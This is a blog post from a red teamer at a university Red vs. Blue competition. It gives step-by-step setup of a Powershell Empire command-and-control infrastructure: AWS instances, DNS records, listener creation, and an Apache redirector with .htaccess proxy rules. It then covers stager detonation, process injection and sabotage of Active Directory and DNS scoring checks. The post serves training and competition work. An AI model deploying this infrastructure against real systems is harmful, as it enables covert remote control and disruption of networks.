Tales of a Red Teamer: How to setup a C2 infrastructure for Powershell Empire – UB 2018

This past weekend, I had the pleasure of red teaming at University of Buffalo’s competition called Lockdown. It was a fantastic competition and I had ALOT of fun interacting/challenging the blue teamers on Windows. This blog post will focus on my C2 infrastructure setup for Powershell Empire.

DISCLAIMER

The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises. 

DISCLAIMER

Network diagram

Create/Setup AWS resources

Create VPC network

  1. Login into AWS
  2. Select “VPC” from the list of AWS services
  3. Select “Start VPC Wizard”
  4. Select “VPC with a Single Public Subnet”
    1. Enter “10.21.0.0/16” for “IPv4 CIDR block”
    2. Enter “RedTeamVPC” for “VPC Name”
    3. Enter “10.21.1.0/24” for “Public subnet’s IPv4 CIDR”
    4. Enter “RedTeamVPC_Pub” for “Public subnet name”
    5. Select “Create VPC”

Create EC2 instances

Teamserver

  1. Select “EC2” from the list of services
  2. Select “Launch instance”
  3. Step 1: Choose an Amazon Machine Image (AMI)
    1. Select “Ubuntu Server 16.04 LTS (HVM), SSD Volume Type”
  4. Step 2: Choose an Instance Type
    1. Select “t2.medium”
    2. Select “Configure Instance Details”
  5. Step 3: Configure Instance Details
    1. Select “RedTeamVPC” for network
    2. Make sure “RedTeamVPC_pub” is selected for “Subnet”
    3. Select “Enable” for “Auto-assign Public IP”
    4. Select “Next: Add storage”
  6. Step 4: Add Storage
    1. Enter “20” for “Size (GiB)”
    2. Select “Add tags”
  7. Step 5: Add tags
    1. Select “Add tag”
    2. Enter “Name” for key
    3. Enter “Redteam-teamserver” for value
    4. Select “Configure Security Group”
  8. Step 6: Configure Security Group
    1. Enter “Redteam-teamserver” for security group name
    2. For the SSH rule enter YOUR public IP for source
      1. My school has public IP range which I will use
    3. Select “Add rule”
      1. Set type to “All traffic”
      2. Enter “10.21.1.0/24” for source
    4. Select “Review and Launch”
  9. Step 7: Review Instance Launch
    1. Select Launch
    2. For the Key pair select “existing key pair” or “new key pair”
      1. Select “Launch instance”
  10. Select “View instances”
  11. Wait for new instance to initialize completely
    1. The “Status checks” column should be “2/2 checks passed”
  12. Copy the “IPv4 Public IP” for the new instance

C2 servers

  1. Select “EC2” from the list of services
  2. Select “Launch instance”
  3. Step 1: Choose an Amazon Machine Image (AMI)
    1. Select “Ubuntu Server 16.04 LTS (HVM), SSD Volume Type”
  4.  Step 2: Choose an Instance Type
    1. Select “t2.small”
    2. Select “Configure Instance Details”
  5. Step 3: Configure Instance Details
    1. Enter “1” for “Number of instances”
      1. Ignore the 3 in the photo
    2. Select “RedTeamVPC” for network
    3. Make sure “RedTeamVPC_pub” is selected for “Subnet”
    4. Select “Enable” for “Auto-assign Public IP”
    5. Select “Next: Add storage”
  6. Step 4: Add Storage
    1. Enter “20” for “Size (GiB)”  
    2. Select “Add tags”
  7. Step 5: Add Tags
    1. Select “Add tag”
    2. Enter “Name” for key
    3. Enter “Redteam-c2” for value
    4. Select “Configure Security Group”
  8. Step 6: Configure Security Group
    1. Enter “Redteam-c2” for security group name
    2. For the SSH rule enter YOUR public IP for source
      1. My school has public IP range which I will use
    3.  Select “Add rule”Set type to “HTTP”
    4. Enter “X.X.X.X” for source
      1. From anywhere:  “0.0.0.0/0”
      2. Specific range: “129.21.0.0/16”
    5. Select “Review and Launch”
  9. Step 7: Review Instance LaunchSelect Launch
    1. Select Launch
    2. For the Key pair select “existing key pair” or “new key pair”
      1. Select “Launch instance”
  10.  Select “View instances”
  11. Wait for new instance to initialize completely
    1. The “Status checks” column should be “2/2 checks passed”
  12.  Copy the “IPv4 Public IP” for the new instance

Setup/Configure domains via Namecheap

This guide assumes you already have domains purchased. You DO NOT have to use Namecheap but it is my registrar of choice :). I will be using “hackinglab.beer” for my teamserver and “scriptkiddie.ninja” for my C2.

Hackinglab.beer – teamserer

  1. Log into Namecheap.com
  2. Select “Domain list” on the left
  3. Select “Manage” by the domain you wish to configure
    1. One of my domains is Hackinglab.beer for the teamserver
  4. Select “Advance DNS” tab at the top
  5. Select “Add new record”
    1. Select “A record” for type
    2. Enter “empire” for host
    3. Enter “<EC2 public IP addr for Empire teamserver>” for value
    4. Select the check mark to save record

Scriptkiddie.ninja – c2

  1. Select “Domain list” on the left
  2. Select “Manage” by the domain you wish to configure
    1. One of my domains is scriptkiddie.ninja for my C2
  3. Select “Advance DNS” tab at the top
  4. Select “Add new record”
    1. Select “A record” for type
    2. Enter “@” for host
    3. Enter “<EC2 public IP addr for C2>” for value
    4. Select the check mark to save record

Install/Setup Powershell Empire teamserver

Initial setup

  1. ssh ubuntu@empire.hackinglab.beer
  2. sudo apt update -y && sudo apt upgrade -y
  3. sudo apt install vim git tmux -y
  4. tmux new -s empire
    1. Creates a new TMUX session named empire
    2. tmux basics
      1. Detach from tmux session: Control +B +D
      2. Enter tmux session: tmux attach -t empire
  5. git clone https://github.com/EmpireProject/Empire.git
  6. sudo ./setup/install.sh
  7. Hit enter for “Enter server negotiation password, enter for random generation:”
  8. sudo chown ubuntu:ubuntu -R ../Empire
  9. ./empire

Create listener

This section may be a bit confusing at first, like it was for me. The Host part of the Listener is the address that will be set in Powershell Empire stager. This is why we set it to “http://scriptkiddie.ninja” because our C2 is located at the domain of “scriptkiddie.ninja” and Apache is listening on port 80. Next, we set Port 5000 which is local port that the listener will use on the Empire teamserver. Our Apache C2 server will redirect all traffic coming in on port 80 to port 5000 on our teamserver.

  1. Enter “listeners”
  2. Enter “uselistener http”
    1. set Name httpScriptkiddie
    2. set Host http://scriptkiddie.ninja:80
    3. set Port 5000
    4. execute
      1. ignore warning

Install/Setup C2 servers – redirectors

The credit of this section goes to BlueScreenOfJeff. Here is the entire guide write up for the Apache C2 HTTPs redirector, thanks BlueScreenOfJeff!!! This blog post will only implement HTTP and not HTTPS. If you want HTTPS please follow the guide provided. FYI, all redirects that don’t match “.htaccess” will be redirected to “https://google.com”.

  1. ssh ubuntu@malawarelove.xyz
  2. sudo su
  3. apt update -y && sudo apt upgrade -y
  4. apt install apache2 -y
  5. a2enmod ssl rewrite proxy proxy_http
  6. a2ensite default-ssl.conf
  7. systemctl restart apache2
  8. systemctl enable apache2
  9. vim /etc/apache2/apache2.conf
    1. find “<Directory /var/www/>”
      <Directory /var/www/>
      Options Indexes FollowSymLinks
      AllowOverride All
      Require all granted
      </Directory>
      
    2. save and exit
  10. vim /var/www/html/.htaccess
    1. Add:
      RewriteEngine On
      RewriteCond %{REQUEST_URI} ^/(admin/get.php|login/process.php|news.php)/?$ [NC]
      RewriteRule ^.*$ http://<PRIVATE IP addr of Empire>:<Empire listener port - 5000>%{REQUEST_URI} [P]
      RewriteRule ^.*$ https://google.com/ [L,R=302]
      
    2. save and exit
  11. systemctl restart apache2

Hammer time: Powershell Empire

Generate Empire stager

  1. Go back to Empire teamserver
  2. usestager multi/launcher httpScriptkiddie
  3. execute

Detonate Empire stager

For initial compromise of the machines, I have scripts that utilize PSexec and WinRM to log into machines and run commands. Unfortunately, at this time I will not be sharing those scripts because it is not the focus of this blog post. Please refer to Mubix’s blog post on Executing code via SMB/DCOM Without PSexec for a tutorial on initial compromise.

  1. Copy the Powershell Empire stager output from above
  2. Open Powershell prompt on a Windows machine
  3. Paste contents from above into Powershell and press enter
  4. Return to Empire teamserver

Interacting with Empire beacon

System info

  1. interact <new agent ID>
  2. sysinfo

Process list

  1. ps

Red team tactics

HTTP Beacons

Empire uses a technique called beaconing. An Empire agent running on your machine will periodically will call back to the Empire teamserver for new tasks. If the teamserver has no tasks for the agent it will go back to sleep. If the teamserver has tasks for the agent it will run those tasks and return the results. Beacons can be very hard to find because the transaction happens so fast(witin miliseconds). The best way to detect beaconing is monitoring DNS queries and monitoring HTTP traffic with Wireshark.

Process injection

Once my Empire agents made it onto the machine I had a script that would migrate them to another process, such as Explorer.exe. Process injection is a technique used for running code within the address space of another process. I will not reveal the process I migrated too but it is a process that SHOULD not be initiating requests to the Internet. Process Explorer and Process Monitor are two tools in the Sysinternals toolkit that allow you to analyze the system for this type of activity.

Active Directory

The scoring engine was checking round robin style, if three accounts existed by doing an ldapsearch for those users. The first tactic I used was to delete one of  the three users. I will be honest, I was laughing to myself when I did this because one out of three checks would fail. When this happens look at the scoring engine logs, if you have the permissions to do so. Next, I renamed one of the three users by switching two letters in the username. For example, the valid user “nickbird” became “nicbkird”. Again this made one out of three checks fail. Finally, at the end red team wanted a red board, to make this happen I disabled the Active Directory Service with a script.

DNS server

The scoring engine was checking to see if one out of 8 DNS records existed. However, I left the “ad.teamX” record because I wasn’t sure if that would break clients connecting to the domain. Additionally, this meant that clients connecting to the domain would still work :). Next, I tried disabled the DNS server service but alot of teams caught onto this and re-enabled it. Finally, to make the board red I paused the DNS zone for the local domain. This allowed you to resolv “google.com” via your local DNS but it couldn’t resolv “gitlab.teamX”.

Takeaway for blue teamers

I have been doing Red vs. Blue competitions since my freshmen year (5 years). Being a Blue teamer can be overwhelming, challenging, difficult, stressful, and incredibly complex. Our job as Red teamers is to create an environment that challenges Blue teamers to learn new things, to create unique solutions to problems that arise, and to create stress through various Red team activities. I know that last part may sound terrible, but handling stress is a good avenue to help mature and polish your skills. In the real world, when breaches occur, you need to keep cool, calm, and collected to handle the incident in an appropriate and timely manner. One way to know how you will react to a real-world situation, is to participate in these competitions. Alex Levinson, a National CCDC Red teamer, says it best “You can’t buy experience. It must be earned through sweat, tears, and many sleepless nights.”

During these competitions, you will fail and that is OKAY, but make a list and when you go home, improve upon where you fell short. This is a continuous cycle that I do after EVERY competition. As a Red teamer, I really want you to KICK ME OUT OF YOUR BOX! I will do everything to STOP that from happening, but I genuinely do want you to succeed!

Finally, team moral is a huge factor that usually dictates if a team will win or not. The teams that have good moral will typically win but not in all cases. The RIT CCDC team that I competed with loved singing Taylor Swift, and when the stress levels were high we would start singing TSwift to reduce the stress. I encourage all teams to do something similar, heck have corny jokes on hand – everyone loves dad jokes. How you and your team handle the stress may be the factor that makes you the winning team or the losing team. As a last and final note, if you walk away learning something YOU ARE A WINNER. Competitions are a place to LEARN and a place to make mistakes that won’t impact the lives of others, unlike the real word.

DISCLAIMER

The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises. 

DISCLAIMER

Resources/Sources

Leave a Reply

Your email address will not be published. Required fields are marked *